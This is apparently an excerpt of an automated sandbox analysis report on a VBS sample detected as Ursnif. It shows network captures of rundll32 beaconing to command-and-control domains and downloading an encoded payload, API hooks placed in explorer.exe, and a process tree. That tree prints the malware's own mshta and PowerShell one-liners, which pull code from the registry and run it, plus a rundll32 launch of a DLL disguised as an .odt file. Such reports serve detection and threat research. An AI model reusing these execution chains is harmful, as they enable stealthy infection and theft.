e6 93 81 f5 86 59 30 d4 48 1b f4 c3 7f 79 70 16 1e 2e 90 19 4e 3c 60 05 e5 ea 44 29 da 63 11 63 52 73 9a d9 2b 29 82 7d 7e 96 17 86 cd b8 ef b1 cb 79 8a 6d 38 dc 56 2a 0c 4f ac 3d b8 d9 6d 0f 6f 21 b0 68 ab 2e 21 5e 05 1f d6 e7 29 d1 ea 8e 6c 17 9b 02 a3 71 85 f6 fa 00 01 67 a8 da ef 4d 34 49 b3 d9 94 2a 9e 41 d7 54 4a 5c d1 32 65 8e cf c7 66 a3 56 ed e4 ba c4 5d 34 91 3d 82 bb b3 db d1 a9 85 0e 36 6a f9 a9 6c 39 2d c7 ec 3c dc 85 d0 15 bb e0 6c 45 e6 71 55 c5 1d 46 73 f7 f3 32 92 1a 03 cd cc c7 ca 6e bc 8a 67 de 5a a1 6a 3e e1 b9 dd 4e 1c cf 62 33 f1 63 bd 77 b6 8c 23 a4 d1 f3 e1 07 0a b4 3b b5 01 e9 ed 78 51 c8 7a e5 dc 3a
                              Data Ascii: =LIZfM\h3ukx[bX$xE`S|g&DT9Cp(b4,aYV2c$OQ,N~i$rcc4F90'~gaA{.kA,$HaN8|7\lVgQObRX|zC&Z1{2TN]BQa|K?OdF4!D.Z`j8X)hPP"XA[U{YX-_tC@dN63(Ns"CG)]HO'tS~L5B=`OwuBwp fhW\wG:L~LF6'u[s%pZA[g02G3w>Q_9P'C}}ZtVMfX>~Z4>@lKTPKyXN%%;}?%0(Gvm=<c-P!Pzd$J4/'9.I_~=V;,E9GVA05vK/1Uumm/e5"j>bXA96.6E2^ja~{DY0Hyp.N<`D)ccRs+)}~ym8V*O=mo!h.!^)lqgM4I*ATJ\2efV]4=6jl9-<lEqUFs2ngZj>Nb3cw#;xQz:


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              2192.168.2.349746185.228.233.1780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Aug 2, 2021 22:06:44.399979115 CEST12633OUTGET /kOsDeCoa3YCbt/7unBBLww/wK2a4bs_2FEI4QMN91PzB77/bz4N4g_2FJ/HycIy3_2F8zj3jBC0/8_2FW3BGV1mS/XPDK9f9Rzez/BpS5UyR9Bg2zMd/a_2FnA03_2FZhf2fI92gT/6Pq3nEyBr7Wl1SSB/zAmSQjqWqXfIY_2/Byf0kTcmXemOm2EfN6/CRY7WM32g/emO80EseOb_2BSjCXMeG/FctE3VztzFEWZR0a5bZ/yCEZcBPGdi592UoFqj3gHf/9Ntn0rghQ_2Bu/Ix9av6MS/M_2FOYWbdmDkx6Xj7Ngd9FO/n_2Fp4ojwk/l2YrsEsA6NU73tN6Q/Nzovizi1/wIzBsN1hETht/VNa HTTP/1.1
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                              Pragma: no-cache
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
                              Host: gtr.antoinfer.com
                              Aug 2, 2021 22:06:44.934506893 CEST12635INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Mon, 02 Aug 2021 20:06:44 GMT
                              Content-Type: application/octet-stream
                              Content-Length: 1955
                              Connection: close
                              Pragma: public
                              Accept-Ranges: bytes
                              Expires: 0
                              Cache-Control: must-revalidate, post-check=0, pre-check=0
                              Content-Disposition: inline; filename="61085054d91e7.bin"
                              Strict-Transport-Security: max-age=63072000; includeSubdomains
                              X-Content-Type-Options: nosniff
                              Data Raw: f5 8f f6 38 cf 75 c2 a1 af 6c 53 15 9f 46 22 3c 49 78 46 3a 7f 56 ef 3b 00 0e 0a 06 1a 89 ec 92 46 5a a5 b0 50 78 f4 1a 53 10 1f 04 70 45 b6 72 16 57 e3 c6 fd d1 66 98 99 a3 95 5b 31 fc 1f 93 fb 36 e9 6c ca 60 00 2e a7 94 d3 9e 8d 74 a8 be 6d 4f 00 73 6b 8f 2c 91 24 20 dd f0 40 82 3a 9f 73 86 75 43 62 02 dd 62 5d 56 02 05 ee bd e6 39 91 8e 61 61 1e 3a 93 a3 96 0a b3 de 63 b7 43 ad 0e c2 5a 40 48 c4 2f bd 39 28 19 4b 6f b3 2f cb e7 59 fb 84 9f 50 02 4a 10 d1 42 eb 25 a3 5f a7 ab f5 aa 08 cc 61 f4 e9 93 ba ab 19 bb fc 48 c4 1c e5 03 a1 c6 9c be f4 67 c7 c4 4f e0 6a 41 a0 0c a5 ea 40 bd 60 a7 83 7b 6f 06 ba 87 d6 39 e1 7a f0 5a 1b 46 4a 2f 2d 1d da 4a 97 02 b1 f9 45 98 33 8d 15 20 2f ae a0 79 f9 b6 d6 42 12 52 b3 65 2f 52 46 b0 97 c4 26 49 e9 df 60 e0 05 1e bb 1b 46 be e1 92 d0 b0 80 62 5e 71 af 48 a6 60 85 a3 63 88 0d a0 c6 12 3d 26 1e a4 a4 e4 77 7b 98 83 b4 02 b1 85 31 46 4f 9b e2 84 16 8b ad 00 d1 d0 de e7 e7 83 f6 f0 11 d7 83 9d 68 25 af fe 33 81 c4 fa 60 ef 89 7f 00 a0 f7 c9 68 3a 73 ba 9e d8 a9 54 2d e8 0e 8b a8 c7 d2 14 4e 73 f7 ce d7 5a 74 3b 37 2f d0 29 4c 87 e0 72 b6 2e 0e a2 f0 29 fb 9c 94 01 5d a0 a0 18 d1 a1 e5 22 3b eb bc 0c 44 c5 58 7b fb 29 f4 f5 64 22 f3 5d 79 c4 12 91 47 b2 fb 65 97 64 ca ec fa 30 93 25 76 ba 04 f2 9a 3c 4d 70 36 b5 fc 69 1f d4 59 cf 21 38 cb 0f b9 d0 44 02 8a 97 42 22 4d 8f 52 3b 59 99 16 fa ac 93 82 c8 b1 1c a4 48 7a 4e 49 8f 8f c5 1a 8f c6 50 6e d8 cc 13 d4 48 31 c3 23 74 30 a0 c6 5e 2b 9c 37 19 02 1a cb 12 e5 5c fe b2 b0 4b 8e 40 5b d9 f8 2c 41 38 90 0a fb 1b a4 47 bf 98 89 b3 37 14 ca 3e 99 9d b8 d7 47 88 b5 42 ac f9 5d 52 bd 52 fc a9 0b 89 3c 65 c5 92 c0 e3 c7 87 05 6a 94 e4 04 67 30 db 32 2d c0 67 ab 8f d0 b2 64 e4 80 90 1b f2 10 10 9d b0 da 07 99 da e2 a8 c7 d8 45 20 50 82 87 02 04 af 95 5c 7e 30 32 21 ba c5 09 ed 8a ab 3c 82 ac 23 e0 84 10 95 31 81 89 39 a8 f7 4a 21 87 ce 70 54 99 19 6c d6 06 88 8c db 10 b0 06 f8 ed 55 38 6a 32 dd 2e 25 22 8a 4b 5e 05 4d 1d 85 ad c1 fa 6a 9c 59 a4 af 33 c6 31 51 a5 e4 0a 57 e5 3b 06 8c 81 f9 dd 9a 3a 2d 0a 92 76 44 49 86 c1 07 2b a3 8f 9b 14 1c eb 46 56 cc 1a b0 c1 cb f2 e3 c1 21 56 08 04 9e 9b 49 7f 88 ce 6e f9 a9 c6 11 11 77 94 f5 de a3 4a 52 03 e3 6c 67 2f 45 cc 54 33 cd 85 a3 8f 33 4f 0d 79 f8 4c 04 79 aa 0c d3 c8 93 7a 24 9f 20 7d 02 4e fa a5 36 88 b0 9a e8 20 9b 62 f3 31 17 32 46 21 12 b8 33 1f 27 ce 93 16 95 fb 01 99 67 ac 53 06 2e 23 6c 42 83 1c 2a 75 b2 89 86 99 a0 17 5d ac 8e 31 36 3b e8 1d 84 22 ea 4f 8e 2a 21 2b d7 3a 5d 2c eb 26 50 d3 e5 ec 3c 58 f2 49 aa e0 4b 9f b1 ed 72 95 fd 0d 15 ad b4 9e 0a 60 06 f9 f5 9e a9 98 2d 0b 77 68 29 e6 b2 2a 0a ca de a4 62 55 e9 f1 34 c2 8e c2 b7 15 21 ba 0d c5 6b b1 2e 90 29 f2 5e d1 64 32 0e 35 97 9f ed 68 cd e9 ae 09 ea db 3d fc 91 09 e3 43 e5 ab c3 f0 2d c3 9e e5 d7 e6 5d 57 a7 1f 37 6a b5
                              Data Ascii: 8ulSF"<IxF:V;FZPxSpErWf[16l`.tmOsk,$ @:suCbb]V9aa:cCZ@H/9(Ko/YPJB%_aHgOjA@`{o9zZFJ/-JE3 /yBRe/RF&I`Fb^qH`c=&w{1FOh%3`h:sT-NsZt;7/)Lr.)]";DX{)d"]yGed0%v<Mp6iY!8DB"MR;YHzNIPnH1#t0^+7\K@[,A8G7>GB]RR<ejg02-gdE P\~02!<#19J!pTlU8j2.%"K^MjY31QW;:-vDI+FV!VInwJRlg/ET33OyLyz$ }N6 b12F!3'gS.#lB*u]16;"O*!+:],&P<XIKr`-wh)*bU4!k.)^d25h=C-]W7j


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              3192.168.2.349747185.228.233.1780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Aug 2, 2021 22:07:15.658662081 CEST12638OUTGET /G_2BtrdeOa30tm0G9t89_/2B2JiDdQSL9x3Q_2/FX260sNBDITgyeI/BpdcrPIFomZZkoPh3u/AGrnxiUWf/rTd4z_2FOnqpP22ZfzjV/mxG1oweqZWhdtbLmZAx/FWCeM7DpHnLSREoZzBO0OT/Gl1f2t9tfS_2B/ptWI3fqD/FvNQq67awVJw_2B1kVzh8_2/BYbRBRJlE6/co1z79C1RuybQlL62/8psEOCbjHHAG/PdRgwv9Npt6/R_2FEA3He8vvaK/f3TQbAUz8vl1HZbrGMu9B/8naEcnAAoMKIKsYO/rVxHWtDfSOnGKso/2ZAFkBCgt5yBJA/G HTTP/1.1
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                              Pragma: no-cache
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
                              Host: app.flashgameo.at
                              Aug 2, 2021 22:07:16.188829899 CEST12638INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Mon, 02 Aug 2021 20:07:16 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Vary: Accept-Encoding
                              Strict-Transport-Security: max-age=63072000; includeSubdomains
                              X-Content-Type-Options: nosniff
                              Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              4192.168.2.349748185.228.233.1780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Aug 2, 2021 22:07:16.567487955 CEST12639OUTPOST /x7RHILsUu13RNWdAgcyIG/qtXPZ5mShxWyId8A/aqzFvUR1vpmX8Up/q_2B2EdTfKMNCz0qxF/_2FPDHq0L/LUAKCoi5Kv4k92FCS9c4/5pNcQF7C6KYMZBsUSDt/KFidT5iQrYQJ8LRP_2FoLY/f_2B88YT7woyk/KKJVXmPv/vF_2FE_2Fvc1X20QJ8r0Wn_/2BzNsjc_2F/YMdyw7a8HJLKOf2JR/adM5VRnv5AOV/eVROMbVITYu/4QdgxMF4kpaBK6/UL3JxZ6B_2FLQEdWMX_2B/oDqnX_2BCDatYw9I/KVGr3LtJ92s34dn/eT_2Bba67PTBBLkoO/1xww0J HTTP/1.1
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                              Pragma: no-cache
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
                              Content-Length: 2
                              Host: app.flashgameo.at


                              Code Manipulations

                              User Modules

                              Hook Summary

                              Function NameHook TypeActive in Processes
                              CreateProcessAsUserWEATexplorer.exe
                              CreateProcessAsUserWINLINEexplorer.exe
                              CreateProcessWEATexplorer.exe
                              CreateProcessWINLINEexplorer.exe
                              CreateProcessAEATexplorer.exe
                              CreateProcessAINLINEexplorer.exe
                              api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIATexplorer.exe
                              api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIATexplorer.exe

                              Processes

                              Process: explorer.exe, Module: KERNEL32.DLL
                              Function NameHook TypeNew Data
                              CreateProcessAsUserWEAT7FFB70FF521C
                              CreateProcessAsUserWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                              CreateProcessWEAT7FFB70FF5200
                              CreateProcessWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                              CreateProcessAEAT7FFB70FF520E
                              CreateProcessAINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                              Process: explorer.exe, Module: user32.dll
                              Function NameHook TypeNew Data
                              api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FFB70FF5200
                              api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT612B8A8
                              Process: explorer.exe, Module: WININET.dll
                              Function NameHook TypeNew Data
                              api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FFB70FF5200
                              api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT612B8A8

                              Statistics

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Start time:22:02:55
                              Start date:02/08/2021
                              Path:C:\Windows\System32\wscript.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\v8MaHZpVOY2L.vbs'
                              Imagebase:0x7ff62b2c0000
                              File size:163840 bytes
                              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Start time:22:05:37
                              Start date:02/08/2021
                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                              Imagebase:0x7ff66d5c0000
                              File size:488448 bytes
                              MD5 hash:A782A4ED336750D10B3CAF776AFE8E70
                              Has elevated privileges:true
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              General

                              Start time:22:05:37
                              Start date:02/08/2021
                              Path:C:\Windows\System32\rundll32.exe
                              Wow64 process (32bit):false
                              Commandline:rundll32 C:\Users\user\AppData\Local\Temp\beneficial.odt,DllRegisterServer
                              Imagebase:0x7ff79da10000
                              File size:69632 bytes
                              MD5 hash:73C519F050C20580F8A62C849D49215A
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Start time:22:05:38
                              Start date:02/08/2021
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32 C:\Users\user\AppData\Local\Temp\beneficial.odt,DllRegisterServer
                              Imagebase:0xcc0000
                              File size:61952 bytes
                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001C.00000003.690672624.0000000005348000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001C.00000003.684029737.0000000005348000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001C.00000003.692412870.000000000514C000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001C.00000003.684015190.0000000005348000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001C.00000003.683939113.0000000005348000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001C.00000003.687299235.0000000005348000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001C.00000003.683982303.0000000005348000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001C.00000003.684001353.0000000005348000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001C.00000003.683872058.0000000005348000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001C.00000003.683963562.0000000005348000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001C.00000003.683912558.0000000005348000.00000004.00000040.sdmp, Author: Joe Security
                              Reputation:high

                              General

                              Start time:22:06:40
                              Start date:02/08/2021
                              Path:C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                              Imagebase:0xeb0000
                              File size:426496 bytes
                              MD5 hash:7AB59579BA91115872D6E51C54B9133B
                              Has elevated privileges:true
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              General

                              Start time:22:06:48
                              Start date:02/08/2021
                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                              Imagebase:0x7ff66d5c0000
                              File size:488448 bytes
                              MD5 hash:A782A4ED336750D10B3CAF776AFE8E70
                              Has elevated privileges:true
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              General

                              Start time:22:06:49
                              Start date:02/08/2021
                              Path:C:\Windows\System32\mshta.exe
                              Wow64 process (32bit):false
                              Commandline:'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Bmd2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bmd2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                              Imagebase:0x7ff7f5bf0000
                              File size:14848 bytes
                              MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              General

                              Start time:22:06:51
                              Start date:02/08/2021
                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):false
                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                              Imagebase:0x7ff785e30000
                              File size:447488 bytes
                              MD5 hash:95000560239032BC68B4C2FDFCDEF913
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Reputation:high

                              General

                              Start time:22:06:52
                              Start date:02/08/2021
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6b2800000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Start time:22:07:01
                              Start date:02/08/2021
                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              Wow64 process (32bit):false
                              Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.cmdline'
                              Imagebase:0x7ff674840000
                              File size:2739304 bytes
                              MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Reputation:moderate

                              Disassembly

                              Code Analysis

                              Reset < >